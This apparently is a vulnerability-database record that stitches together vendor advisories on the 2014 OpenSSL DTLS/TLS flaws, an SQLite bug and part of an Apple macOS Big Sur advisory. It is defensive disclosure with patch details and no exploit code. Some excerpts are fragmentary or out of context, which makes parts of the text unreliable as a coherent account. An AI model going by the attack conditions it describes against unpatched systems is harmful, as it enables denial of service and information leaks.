var-201408-0094 Double free vulnerability in d1_both.c in the DTLS implementation in OpenSSL 0.9.8 before 0.9.8zb, 1.0.0 before 1.0.0n, and 1.0.1 before 1.0.1i allows remote attackers to cause a denial of service (application crash) via crafted DTLS packets that trigger an error condition. OpenSSL is prone to a denial-of-service vulnerability. An attacker can exploit this issue to crash the affected application, denying service to legitimate users. OpenSSL prior to 0.9.8zb, 1.0.0n, and 1.0.1i are vulnerable. - The SSLv3 vulnerability known as "Padding Oracle on Downgraded Legacy Encryption" also known as "Poodle", which could be exploited remotely resulting in disclosure of information. Alternatively, you may reboot your system. For the testing distribution (jessie), these problems will be fixed soon. Release Date: 2014-08-14 Last Updated: 2014-08-14 Potential Security Impact: Remote Denial of Service (DoS), unauthorized access. Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY Potential security vulnerabilities have been identified with HP-UX running OpenSSL. These vulnerabilities could be exploited remotely to create a Denial of Service (DoS), allow unauthorized access. References: CVE-2014-3505 - Remote Denial of Service (DoS) Application crash CVE-2014-3506 - Remote Denial of Service (DoS) Memory consumption CVE-2014-3507 - Remote Denial of Service (DoS) Memory consumption CVE-2014-3508 - Unauthorized access (Pretty printing) CVE-2014-3510 - Remote Denial of Service (DoS) Client application crash SSRT101674 SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP-UX B.11.11, B.11.23, B.11.31 running OpenSSL versions before 0.9.8zb BACKGROUND CVSS 2.0 Base Metrics =========================================================== Reference Base Vector Base Score CVE-2014-3505 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2014-3506 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2014-3507 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2014-3508 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3 CVE-2014-3510 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3 =========================================================== Information on CVSS is documented in HP Customer Notice: HPSN-2008-002 RESOLUTION HP has provided the following updates to resolve these vulnerabilities. The updates are available from https://h20392.www2.hp.com/portal/swdepot/displayP roductInfo.do?productNumber=OPENSSL11I HP-UX Release HP-UX OpenSSL version B.11.11 (11i v1) OpenSSL_A.00.09.08zb.001_HP-UX_B.11.11_32_64.depot B.11.23 (11i v2) OpenSSL_A.00.09.08zb.002_HP-UX_B.11.23_IA-PA.depot B.11.31 (11i v3) OpenSSL_A.00.09.08zb.003_HP-UX_B.11.31_IA-PA.depot MANUAL ACTIONS: Yes - Update Install OpenSSL A.00.09.08zb or subsequent PRODUCT SPECIFIC INFORMATION HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see: https://www.hp.com/go/swa The following text is for use by the HP-UX Software Assistant. AFFECTED VERSIONS HP-UX B.11.11 ================== openssl.OPENSSL-CER openssl.OPENSSL-CONF openssl.OPENSSL-DOC openssl.OPENSSL-INC openssl.OPENSSL-LIB openssl.OPENSSL-MAN openssl.OPENSSL-MIS openssl.OPENSSL-PRNG openssl.OPENSSL-PVT openssl.OPENSSL-RUN openssl.OPENSSL-SRC action: install revision A.00.09.08zb.001 or subsequent HP-UX B.11.23 ================== openssl.OPENSSL-CER openssl.OPENSSL-CONF openssl.OPENSSL-DOC openssl.OPENSSL-INC openssl.OPENSSL-LIB openssl.OPENSSL-MAN openssl.OPENSSL-MIS openssl.OPENSSL-PRNG openssl.OPENSSL-PVT openssl.OPENSSL-RUN openssl.OPENSSL-SRC action: install revision A.00.09.08zb.002 or subsequent HP-UX B.11.31 ================== openssl.OPENSSL-CER openssl.OPENSSL-CONF openssl.OPENSSL-DOC openssl.OPENSSL-INC openssl.OPENSSL-LIB openssl.OPENSSL-MAN openssl.OPENSSL-MIS openssl.OPENSSL-PRNG openssl.OPENSSL-PVT openssl.OPENSSL-RUN openssl.OPENSSL-SRC action: install revision A.00.09.08zb.003 or subsequent END AFFECTED VERSIONS HISTORY Version:1 (rev.1) - 15 August 2014 Initial release Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com. Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins Security Bulletin Archive: A list of recently released Security Bulletins is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/ Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB. 3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX Copyright 2014 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. The updated packages have been upgraded to the 1.0.0n version where these security flaws has been fixed. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3508 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3509 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3505 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3506 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3507 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3510 http://www.openssl.org/news/secadv_20140806.txt _______________________________________________________________________ Updated Packages: Mandriva Business Server 1/X86_64: 17007f558e739eb863c8507d520ffbc9 mbs1/x86_64/lib64openssl1.0.0-1.0.0n-1.mbs1.x86_64.rpm f810bbe20b2de26cb99d13ddaf0ac2fa mbs1/x86_64/lib64openssl-devel-1.0.0n-1.mbs1.x86_64.rpm 54d87a61ca0440dc5f344931de1ff43e mbs1/x86_64/lib64openssl-engines1.0.0-1.0.0n-1.mbs1.x86_64.rpm 5b1748370e5a855cc31d3eec7673da5e mbs1/x86_64/lib64openssl-static-devel-1.0.0n-1.mbs1.x86_64.rpm 7e19a555629b4a2d3d4533be7786ce5e mbs1/x86_64/openssl-1.0.0n-1.mbs1.x86_64.rpm a9e74f2bab2878f601cfb44620c76dbb mbs1/SRPMS/openssl-1.0.0n-1.mbs1.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/en/support/security/advisories/ If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team <security*mandriva.com> -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.12 (GNU/Linux) iD8DBQFT5HsDmqjQ0CJFipgRAhA5AJ0ZoDe2+SA7K7xk+NZLedQBVoFVvgCffPW9 5geoq7aMnxbnw5eTuuH+iIs= =CK7e -----END PGP SIGNATURE----- . - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201412-39 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: OpenSSL: Multiple vulnerabilities Date: December 26, 2014 Bugs: #494816, #519264, #525468 ID: 201412-39 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Multiple vulnerabilities have been found in OpenSSL, the worst of which could result in Denial of Service or Man-in-the-Middle attacks. Please review the CVE identifiers referenced below for details. Workaround ========== There is no known workaround at this time. Resolution ========== All OpenSSL 1.0.1 users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=dev-libs/openssl-1.0.1j" All OpenSSL 0.9.8 users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=dev-libs/openssl-0.9.8z_p2" Packages which depend on this library may need to be recompiled. Tools such as revdep-rebuild may assist in identifying these packages. References ========== [ 1 ] CVE-2013-6449 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-6449 [ 2 ] CVE-2013-6450 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-6450 [ 3 ] CVE-2014-3505 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-3505 [ 4 ] CVE-2014-3506 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-3506 [ 5 ] CVE-2014-3507 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-3507 [ 6 ] CVE-2014-3509 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-3509 [ 7 ] CVE-2014-3510 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-3510 [ 8 ] CVE-2014-3511 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-3511 [ 9 ] CVE-2014-3512 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-3512 [ 10 ] CVE-2014-3513 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-3513 [ 11 ] CVE-2014-3567 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-3567 [ 12 ] CVE-2014-3568 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-3568 [ 13 ] CVE-2014-5139 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-5139 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-201412-39.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2014 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ===================================================================== Red Hat Security Advisory Synopsis: Moderate: openssl security update Advisory ID: RHSA-2014:1053-01 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2014-1053.html Issue date: 2014-08-13 CVE Names: CVE-2014-0221 CVE-2014-3505 CVE-2014-3506 CVE-2014-3508 CVE-2014-3510 ===================================================================== 1. Summary: Updated openssl packages that fix multiple security issues are now available for Red Hat Enterprise Linux 5. Red Hat Product Security has rated this update as having Moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section. 2. Relevant releases/architectures: Red Hat Enterprise Linux (v. 5 server) - i386, ia64, ppc, s390x, x86_64 Red Hat Enterprise Linux Desktop (v. 5 client) - i386, x86_64 Red Hat Enterprise Linux Desktop Workstation (v. 5 client) - i386, x86_64 3. Description: OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL), Transport Layer Security (TLS), and Datagram Transport Layer Security (DTLS) protocols, as well as a full-strength, general purpose cryptography library. It was discovered that the OBJ_obj2txt() function could fail to properly NUL-terminate its output. This could possibly cause an application using OpenSSL functions to format fields of X.509 certificates to disclose portions of its memory. (CVE-2014-3508) Multiple flaws were discovered in the way OpenSSL handled DTLS packets. (CVE-2014-0221, CVE-2014-3505, CVE-2014-3506) A NULL pointer dereference flaw was found in the way OpenSSL performed a handshake when using the anonymous Diffie-Hellman (DH) key exchange. (CVE-2014-3510) Red Hat would like to thank the OpenSSL project for reporting CVE-2014-0221. Upstream acknowledges Imre Rad of Search-Lab as the original reporter of this issue. All OpenSSL users are advised to upgrade to these updated packages, which contain backported patches to correct these issues. For the update to take effect, all services linked to the OpenSSL library (such as httpd and other SSL-enabled services) must be restarted or the system rebooted. 4. Solution: Before applying this update, make sure all previously released errata relevant to your system have been applied. This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/articles/11258 5. Bugs fixed (https://bugzilla.redhat.com/): 1103593 - CVE-2014-0221 openssl: DoS when sending invalid DTLS handshake 1127490 - CVE-2014-3508 openssl: information leak in pretty printing functions 1127499 - CVE-2014-3505 openssl: DTLS packet processing double free 1127500 - CVE-2014-3506 openssl: DTLS memory exhaustion 1127503 - CVE-2014-3510 openssl: DTLS anonymous (EC)DH denial of service 6. Package List: Red Hat Enterprise Linux Desktop (v. 5 client): Source: openssl-0.9.8e-27.el5_10.4.src.rpm i386: openssl-0.9.8e-27.el5_10.4.i386.rpm openssl-0.9.8e-27.el5_10.4.i686.rpm openssl-debuginfo-0.9.8e-27.el5_10.4.i386.rpm openssl-debuginfo-0.9.8e-27.el5_10.4.i686.rpm openssl-perl-0.9.8e-27.el5_10.4.i386.rpm x86_64: openssl-0.9.8e-27.el5_10.4.i686.rpm openssl-0.9.8e-27.el5_10.4.x86_64.rpm openssl-debuginfo-0.9.8e-27.el5_10.4.i686.rpm openssl-debuginfo-0.9.8e-27.el5_10.4.x86_64.rpm openssl-perl-0.9.8e-27.el5_10.4.x86_64.rpm Red Hat Enterprise Linux Desktop Workstation (v. 5 client): Source: openssl-0.9.8e-27.el5_10.4.src.rpm i386: openssl-debuginfo-0.9.8e-27.el5_10.4.i386.rpm openssl-devel-0.9.8e-27.el5_10.4.i386.rpm x86_64: openssl-debuginfo-0.9.8e-27.el5_10.4.i386.rpm openssl-debuginfo-0.9.8e-27.el5_10.4.x86_64.rpm openssl-devel-0.9.8e-27.el5_10.4.i386.rpm openssl-devel-0.9.8e-27.el5_10.4.x86_64.rpm Red Hat Enterprise Linux (v. 5 server): Source: openssl-0.9.8e-27.el5_10.4.src.rpm i386: openssl-0.9.8e-27.el5_10.4.i386.rpm openssl-0.9.8e-27.el5_10.4.i686.rpm openssl-debuginfo-0.9.8e-27.el5_10.4.i386.rpm openssl-debuginfo-0.9.8e-27.el5_10.4.i686.rpm openssl-devel-0.9.8e-27.el5_10.4.i386.rpm openssl-perl-0.9.8e-27.el5_10.4.i386.rpm ia64: openssl-0.9.8e-27.el5_10.4.i686.rpm openssl-0.9.8e-27.el5_10.4.ia64.rpm openssl-debuginfo-0.9.8e-27.el5_10.4.i686.rpm openssl-debuginfo-0.9.8e-27.el5_10.4.ia64.rpm openssl-devel-0.9.8e-27.el5_10.4.ia64.rpm openssl-perl-0.9.8e-27.el5_10.4.ia64.rpm ppc: openssl-0.9.8e-27.el5_10.4.ppc.rpm openssl-0.9.8e-27.el5_10.4.ppc64.rpm openssl-debuginfo-0.9.8e-27.el5_10.4.ppc.rpm openssl-debuginfo-0.9.8e-27.el5_10.4.ppc64.rpm openssl-devel-0.9.8e-27.el5_10.4.ppc.rpm openssl-devel-0.9.8e-27.el5_10.4.ppc64.rpm openssl-perl-0.9.8e-27.el5_10.4.ppc.rpm s390x: openssl-0.9.8e-27.el5_10.4.s390.rpm openssl-0.9.8e-27.el5_10.4.s390x.rpm openssl-debuginfo-0.9.8e-27.el5_10.4.s390.rpm openssl-debuginfo-0.9.8e-27.el5_10.4.s390x.rpm openssl-devel-0.9.8e-27.el5_10.4.s390.rpm openssl-devel-0.9.8e-27.el5_10.4.s390x.rpm openssl-perl-0.9.8e-27.el5_10.4.s390x.rpm x86_64: openssl-0.9.8e-27.el5_10.4.i686.rpm openssl-0.9.8e-27.el5_10.4.x86_64.rpm openssl-debuginfo-0.9.8e-27.el5_10.4.i386.rpm openssl-debuginfo-0.9.8e-27.el5_10.4.i686.rpm openssl-debuginfo-0.9.8e-27.el5_10.4.x86_64.rpm openssl-devel-0.9.8e-27.el5_10.4.i386.rpm openssl-devel-0.9.8e-27.el5_10.4.x86_64.rpm openssl-perl-0.9.8e-27.el5_10.4.x86_64.rpm These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/#package 7. References: https://www.redhat.com/security/data/cve/CVE-2014-0221.html https://www.redhat.com/security/data/cve/CVE-2014-3505.html https://www.redhat.com/security/data/cve/CVE-2014-3506.html https://www.redhat.com/security/data/cve/CVE-2014-3508.html https://www.redhat.com/security/data/cve/CVE-2014-3510.html https://access.redhat.com/security/updates/classification/#moderate https://www.openssl.org/news/secadv_20140605.txt https://www.openssl.org/news/secadv_20140806.txt 8. Contact: The Red Hat security contact is <secalert@redhat.com>. More contact details at https://access.redhat.com/security/team/contact/ Copyright 2014 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iD8DBQFT69sGXlSAg2UNWIIRAuZjAJ9R5VuNKxbsx8+T/WGZrkH1VheAqgCdHHXN vrHSSMIJuncazkJWPE/LOyQ= =/f7Y -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . Description: Red Hat JBoss Web Server is a fully integrated and certified set of components for hosting Java web applications. It is comprised of the Apache HTTP Server, the Apache Tomcat Servlet container, Apache Tomcat Connector (mod_jk), JBoss HTTP Connector (mod_cluster), Hibernate, and the Tomcat Native library. Solution: The References section of this erratum contains a download link (you must log in to download the update). OpenSSL Security Advisory [6 Aug 2014] ======================================== Information leak in pretty printing functions (CVE-2014-3508) ============================================================= A flaw in OBJ_obj2txt may cause pretty printing functions such as X509_name_oneline, X509_name_print_ex et al. to leak some information from the stack. Applications may be affected if they echo pretty printing output to the attacker. OpenSSL SSL/TLS clients and servers themselves are not affected. Thanks to Ivan Fratric (Google) for discovering this issue. This issue was reported to OpenSSL on 19th June 2014. The fix was developed by Emilia Käsper and Stephen Henson of the OpenSSL development team. Crash with SRP ciphersuite in Server Hello message (CVE-2014-5139) ================================================================== The issue affects OpenSSL clients and allows a malicious server to crash the client with a null pointer dereference (read) by specifying an SRP ciphersuite even though it was not properly negotiated with the client. This can be exploited through a Denial of Service attack. OpenSSL 1.0.1 SSL/TLS client users should upgrade to 1.0.1i. Thanks to Joonas Kuorilehto and Riku Hietamäki (Codenomicon) for discovering and researching this issue. This issue was reported to OpenSSL on 2nd July 2014. The fix was developed by Stephen Henson of the OpenSSL core team. Race condition in ssl_parse_serverhello_tlsext (CVE-2014-3509) ============================================================== If a multithreaded client connects to a malicious server using a resumed session and the server sends an ec point format extension it could write up to 255 bytes to freed memory. OpenSSL 1.0.0 SSL/TLS client users should upgrade to 1.0.0n. OpenSSL 1.0.1 SSL/TLS client users should upgrade to 1.0.1i. Thanks to Gabor Tyukasz (LogMeIn Inc) for discovering and researching this issue. This issue was reported to OpenSSL on 8th July 2014. The fix was developed by Gabor Tyukasz. This can be exploited through a Denial of Service attack. Thanks to Adam Langley and Wan-Teh Chang (Google) for discovering and researching this issue. This issue was reported to OpenSSL on 6th June 2014. The fix was developed by Adam Langley. DTLS memory exhaustion (CVE-2014-3506) ====================================== An attacker can force openssl to consume large amounts of memory whilst processing DTLS handshake messages. This can be exploited through a Denial of Service attack. Thanks to Adam Langley (Google) for discovering and researching this issue. This issue was reported to OpenSSL on 6th June 2014. The fix was developed by Adam Langley. DTLS memory leak from zero-length fragments (CVE-2014-3507) =========================================================== By sending carefully crafted DTLS packets an attacker could cause openssl to leak memory. This can be exploited through a Denial of Service attack. Thanks to Adam Langley (Google) for discovering and researching this issue. This issue was reported to OpenSSL on 6th June 2014. The fix was developed by Adam Langley. OpenSSL DTLS anonymous EC(DH) denial of service (CVE-2014-3510) =============================================================== OpenSSL DTLS clients enabling anonymous (EC)DH ciphersuites are subject to a denial of service attack. A malicious server can crash the client with a null pointer dereference (read) by specifying an anonymous (EC)DH ciphersuite and sending carefully crafted handshake messages. OpenSSL 0.9.8 DTLS client users should upgrade to 0.9.8zb OpenSSL 1.0.0 DTLS client users should upgrade to 1.0.0n. OpenSSL 1.0.1 DTLS client users should upgrade to 1.0.1i. Thanks to Felix Gröbert (Google) for discovering and researching this issue. This issue was reported to OpenSSL on 18th July 2014. The fix was developed by Emilia Käsper of the OpenSSL development team. OpenSSL TLS protocol downgrade attack (CVE-2014-3511) ===================================================== A flaw in the OpenSSL SSL/TLS server code causes the server to negotiate TLS 1.0 instead of higher protocol versions when the ClientHello message is badly fragmented. This allows a man-in-the-middle attacker to force a downgrade to TLS 1.0 even if both the server and the client support a higher protocol version, by modifying the client's TLS records. OpenSSL 1.0.1 SSL/TLS server users should upgrade to 1.0.1i. Thanks to David Benjamin and Adam Langley (Google) for discovering and researching this issue. This issue was reported to OpenSSL on 21st July 2014. The fix was developed by David Benjamin. SRP buffer overrun (CVE-2014-3512) ================================== A malicious client or server can send invalid SRP parameters and overrun an internal buffer. Only applications which are explicitly set up for SRP use are affected. Thanks to Sean Devlin and Watson Ladd (Cryptography Services, NCC Group) for discovering this issue. This issue was reported to OpenSSL on 31st July 2014. The fix was developed by Stephen Henson of the OpenSSL core team. References ========== URL for this Security Advisory: https://www.openssl.org/news/secadv_20140806.txt Note: the online version of the advisory may be updated with additional details over time
var-202005-0223 SQLite before 3.32.0 allows a virtual table to be renamed to the name of one of its shadow tables, related to alter.c and build.c. SQLite There is an unspecified vulnerability in.Information may be tampered with. SQLite is an open source embedded relational database management system based on C language developed by American D.Richard Hipp software developer. The system has the characteristics of independence, isolation and cross-platform. An attacker could exploit this vulnerability to rename the virtual form to the name of one of the shadow forms. Summary: Openshift Serverless 1.10.2 is now available. Solution: See the documentation at: https://access.redhat.com/documentation/en-us/openshift_container_platform/ 4.5/html/serverless_applications/index 4. Bugs fixed (https://bugzilla.redhat.com/): 1918750 - CVE-2021-3114 golang: crypto/elliptic: incorrect operations on the P-224 curve 1918761 - CVE-2021-3115 golang: cmd/go: packages using cgo can cause arbitrary code execution at build time 5. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 APPLE-SA-2020-12-14-4 Additional information for APPLE-SA-2020-11-13-1 macOS Big Sur 11.0.1 macOS Big Sur 11.0.1 addresses the following issues. Information about the security content is also available at https://support.apple.com/HT211931. AMD Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: A malicious application may be able to execute arbitrary code with system privileges Description: A memory corruption issue was addressed with improved input validation. CVE-2020-27914: Yu Wang of Didi Research America CVE-2020-27915: Yu Wang of Didi Research America Entry added December 14, 2020 App Store Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: An application may be able to gain elevated privileges Description: This issue was addressed by removing the vulnerable code. CVE-2020-27903: Zhipeng Huo (@R3dF09) of Tencent Security Xuanwu Lab Audio Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: Processing a maliciously crafted audio file may lead to arbitrary code execution Description: An out-of-bounds read was addressed with improved input validation. CVE-2020-27910: JunDong Xie and XingWei Lin of Ant Security Light- Year Lab Audio Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: Processing a maliciously crafted audio file may lead to arbitrary code execution Description: An out-of-bounds write was addressed with improved input validation. CVE-2020-27916: JunDong Xie of Ant Security Light-Year Lab Audio Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: A malicious application may be able to read restricted memory Description: An out-of-bounds read was addressed with improved bounds checking. CVE-2020-9943: JunDong Xie of Ant Group Light-Year Security Lab Audio Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: An application may be able to read restricted memory Description: An out-of-bounds read was addressed with improved bounds checking. CVE-2020-9944: JunDong Xie of Ant Group Light-Year Security Lab Bluetooth Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: A remote attacker may be able to cause unexpected application termination or heap corruption Description: Multiple integer overflows were addressed with improved input validation. CVE-2020-27906: Zuozhi Fan (@pattern_F_) of Ant Group Tianqiong Security Lab CoreAudio Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: Processing a maliciously crafted audio file may lead to arbitrary code execution Description: An out-of-bounds read was addressed with improved input validation. CVE-2020-27908: JunDong Xie and XingWei Lin of Ant Security Light- Year Lab CVE-2020-27909: Anonymous working with Trend Micro Zero Day Initiative, JunDong Xie and XingWei Lin of Ant Security Light-Year Lab CVE-2020-9960: JunDong Xie and XingWei Lin of Ant Security Light-Year Lab Entry added December 14, 2020 CoreAudio Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: Processing a maliciously crafted audio file may lead to arbitrary code execution Description: An out-of-bounds write was addressed with improved input validation. CVE-2020-10017: Francis working with Trend Micro Zero Day Initiative, JunDong Xie of Ant Security Light-Year Lab CoreCapture Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: An application may be able to execute arbitrary code with kernel privileges Description: A use after free issue was addressed with improved memory management. CVE-2020-9949: Proteas CoreGraphics Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: Processing a maliciously crafted image may lead to arbitrary code execution Description: An out-of-bounds write was addressed with improved input validation. CVE-2020-9883: an anonymous researcher, Mickey Jin of Trend Micro Crash Reporter Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: A local attacker may be able to elevate their privileges Description: An issue existed within the path validation logic for symlinks. This issue was addressed with improved path sanitization. CVE-2020-10003: Tim Michaud (@TimGMichaud) of Leviathan CoreText Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: Processing a maliciously crafted font file may lead to arbitrary code execution Description: A logic issue was addressed with improved state management. CVE-2020-27922: Mickey Jin of Trend Micro Entry added December 14, 2020 CoreText Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: Processing a maliciously crafted text file may lead to arbitrary code execution Description: A memory corruption issue was addressed with improved state management. CVE-2020-9999: Apple Entry updated December 14, 2020 Disk Images Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: An application may be able to execute arbitrary code with kernel privileges Description: An out-of-bounds read was addressed with improved input validation. CVE-2020-9965: Proteas CVE-2020-9966: Proteas Finder Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: Users may be unable to remove metadata indicating where files were downloaded from Description: The issue was addressed with additional user controls. CVE-2020-27894: Manuel Trezza of Shuggr (shuggr.com) FontParser Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: Processing a maliciously crafted image may lead to arbitrary code execution Description: A buffer overflow was addressed with improved size validation. CVE-2020-9962: Yiğit Can YILMAZ (@yilmazcanyigit) Entry added December 14, 2020 FontParser Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: Processing a maliciously crafted font file may lead to arbitrary code execution Description: An out-of-bounds write was addressed with improved input validation. CVE-2020-27952: an anonymous researcher, Mickey Jin and Junzhi Lu of Trend Micro Entry added December 14, 2020 FontParser Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: Processing a maliciously crafted font file may lead to arbitrary code execution Description: An out-of-bounds read was addressed with improved input validation. CVE-2020-9956: Mickey Jin and Junzhi Lu of Trend Micro Mobile Security Research Team working with Trend Micro’s Zero Day Initiative Entry added December 14, 2020 FontParser Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro 